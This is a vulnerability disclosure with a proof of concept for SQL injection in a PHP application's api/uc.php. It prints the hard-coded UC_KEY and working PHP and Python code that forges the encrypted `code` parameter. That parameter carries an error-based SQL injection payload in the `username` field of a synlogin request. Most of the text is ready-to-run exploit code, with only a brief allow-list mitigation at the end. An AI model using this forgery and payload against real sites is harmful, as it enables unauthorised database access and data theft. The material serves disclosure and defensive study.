SQL injection in api/uc.php
Vulnerable file: /api/uc.php
As the code of api/uc.php shows, every $get parameter is recovered by decoding the `code` parameter with UC_KEY, so anyone who knows UC_KEY can both decode and forge it; the `username` value carried inside is used in SQL without sanitisation, which gives SQL injection. In the latest version the key is hard-coded in the configuration as 'UCYKEY' => E063RBKHX22RAVIG (the PoC below passes it as e063rbkHX22RAvIg; note that _authcode() feeds the key through md5(), so its exact case matters).
We can use the following code to compute the `code` value:
<?php
// PoC: forge the `code` parameter for api/uc.php with the known UC_KEY; the SQL payload rides in `username`.
$a = 'time='.time().'&action=synlogin&username=aa" and extractvalue(1,concat(0x7e,user()))#';
$code1 = urlencode(_authcode($a, 'ENCODE', 'e063rbkHX22RAvIg'));
var_dump($code1);exit;

// UCenter-style authcode(): RC4 keyed from md5(UC_KEY), with a 4-char prefix (keyc),
// a 10-digit expiry and a 16-char MAC prepended to the plaintext before encryption.
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    // The key schedule and RC4 loops were swallowed by the '<' during page extraction;
    // restored here from the standard UCenter authcode() implementation.
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if($operation == 'DECODE') {
        // Accept only if not expired (0 = never) and the MAC over the payload matches.
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}
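The same forgery in Python, as an added example that is not part of the original article: a port of the _authcode() routine above, used to build the `code` value for action=synlogin and to replay what api/uc.php recovers from it (urldecode, authcode DECODE, parse_str). It assumes the key the PoC uses (e063rbkHX22RAvIg); the `keyc` prefix and the timestamp are fixed so the output is reproducible, and the allow-list check at the end is an assumed mitigation, not something the vulnerable file does.

```python
"""Forge the api/uc.php `code` parameter with a known UC_KEY.

Added example, not code from the original article: a Python port of the
UCenter authcode() routine, used to build the synlogin payload and to show
what the server recovers from it.
"""
import base64
import hashlib
import re
import time
from urllib.parse import parse_qs, quote_plus, unquote_plus

UC_KEY = "e063rbkHX22RAvIg"  # key exactly as the article's PHP PoC passes it
INJECTION = 'aa" and extractvalue(1,concat(0x7e,user()))#'


def _md5(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def _rc4(cryptkey: str, data: bytes) -> bytes:
    """RC4 as authcode() does it: the 64-char hex cryptkey is cycled over 256 bytes."""
    box = list(range(256))
    rndkey = [ord(cryptkey[i % len(cryptkey)]) for i in range(256)]
    j = 0
    for i in range(256):
        j = (j + box[i] + rndkey[i]) % 256
        box[i], box[j] = box[j], box[i]
    out = bytearray()
    a = j = 0
    for byte in data:
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        out.append(byte ^ box[(box[a] + box[j]) % 256])
    return bytes(out)


def authcode(string, operation="DECODE", key=UC_KEY, expiry=0, keyc=None, now=None):
    """Port of _authcode(). ENCODE takes bytes and returns the token string;
    DECODE takes the token string and returns the payload bytes, or b"" when
    the expiry or the MAC check fails (same rule as the PHP)."""
    now = int(time.time()) if now is None else now
    key = _md5(key.encode())
    keya = _md5(key[:16].encode())
    keyb = _md5(key[16:32].encode())
    if operation == "DECODE":
        keyc, body = string[:4], string[4:]
        data = base64.b64decode(body + "=" * (-len(body) % 4))  # PHP stripped the '='
    else:
        if keyc is None:
            keyc = _md5(str(time.time()).encode())[-4:]  # substr(md5(microtime()), -4)
        stamp = "%010d" % (expiry + now if expiry else 0)
        data = stamp.encode() + _md5(string + keyb.encode())[:16].encode() + string
    result = _rc4(keya + _md5((keya + keyc).encode()), data)
    if operation != "DECODE":
        return keyc + base64.b64encode(result).decode().rstrip("=")
    stamp, mac, payload = result[:10], result[10:26], result[26:]
    try:
        expires = int(stamp)
    except ValueError:
        return b""
    if (expires == 0 or expires - now > 0) and mac == _md5(payload + keyb.encode())[:16].encode():
        return payload
    return b""


def build_synlogin_code(username: str, key: str = UC_KEY, keyc: str = "0000", now=None) -> str:
    """The url-encoded `code` value for action=synlogin with an attacker-chosen username."""
    now = int(time.time()) if now is None else now
    query = f"time={now}&action=synlogin&username={username}".encode()
    return quote_plus(authcode(query, "ENCODE", key, keyc=keyc, now=now))


def server_side_view(code: str, key: str = UC_KEY) -> dict:
    """What api/uc.php recovers: urldecode, authcode DECODE, then parse_str into $get."""
    plain = authcode(unquote_plus(code), "DECODE", key)
    if not plain:
        return {}
    return {k: v[0] for k, v in parse_qs(plain.decode(), keep_blank_values=True).items()}


# Assumed mitigation (not present in the vulnerable file): allow-list the username
# after decoding, before it is interpolated into any SQL.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.\-]{1,30}$")


def username_is_safe(name: str) -> bool:
    return USERNAME_RE.match(name) is not None


if __name__ == "__main__":
    code = build_synlogin_code(INJECTION)
    print("code =", code)
    print("server sees:", server_side_view(code))
    print("allow-list accepts it:", username_is_safe(server_side_view(code)["username"]))
```

Because the token carries only a MAC under the same shared key that the attacker already holds, the server cannot tell a forged `code` from a legitimate one; the only defences are keeping UC_KEY secret (not shipping a fixed default) and treating every decoded field as untrusted input.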
==========================POC && EXP